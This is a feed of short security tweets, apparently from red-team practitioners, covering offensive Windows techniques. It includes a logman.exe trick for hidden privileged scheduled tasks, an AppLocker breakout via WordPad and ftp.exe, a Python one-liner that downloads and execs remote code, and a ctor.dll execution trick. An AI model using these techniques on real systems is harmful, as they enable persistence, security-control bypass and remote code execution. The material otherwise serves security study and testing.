Yash Bharadwaj

Wrote a post on how to use GadgetToJScript with Covenant & Donut https://3xpl01tc0d3r.blogspot.com/2020/02/gadgettojscript-covenant-donut.html … #Covenant #Donut #GadgetToJScript #redteam #processinjection Thanks to @med0x2e for the answering my queries and helping me while exploring #GadgetToJScript tool

#redteam tip: use logman.exe with -b, -rf, -s, and -rc to create highly-privileged local, and remote scheduled tasks. They are deeply hidden in the Task Scheduler GUI, especially as the actions are masked under "Custom Handler". And no one looks for attackers in Perfmon/DCS.

Windows Kernel _IMAGE_DOS_HEADER::e_lfanew Denial Of Service/Memory Corruption https://waleedassar.blogspot.com/2020/01/malformed-pe-header-kernel-denial-of.html …

Here's a cool trick to break out of AppLocker in Citrix environment: 1. Open a dummy RTF file in wordpad 2. Add ftp.exe as an object 3. Click to open ftp (or other similar apps) 4. ftp>!{commmand/app to run} for example: ftp>!cmd <-- blocked? ftp>!powershell <-- not blocked?:)

Python equivalent of PowerShell IEX cradle: python -c 'import urllib2;r=urllib2.urlopen("https://raw.githubusercontent.com/n00py/ReadingList/master/test.py …");exec(http://r.read ())' Let me know if anyone has a better way to do it, but this seems to work.

how to be a bad ctor http://www.hexacorn.com/blog/2020/01/24/how-to-be-a-bad-ctor/ … ctor.dll, LaunchSetup <filename> #LOLBIN

I am Exploit.. Developer....Zindagi meri hacking....https://twitter.com/BeingSheerazAli/status/1220769442096746496 …

@cobalt_io is awesome. Thanks for sponsoring @Owaspseasideshttps://twitter.com/cobalt_io/status/1220749863366692864 …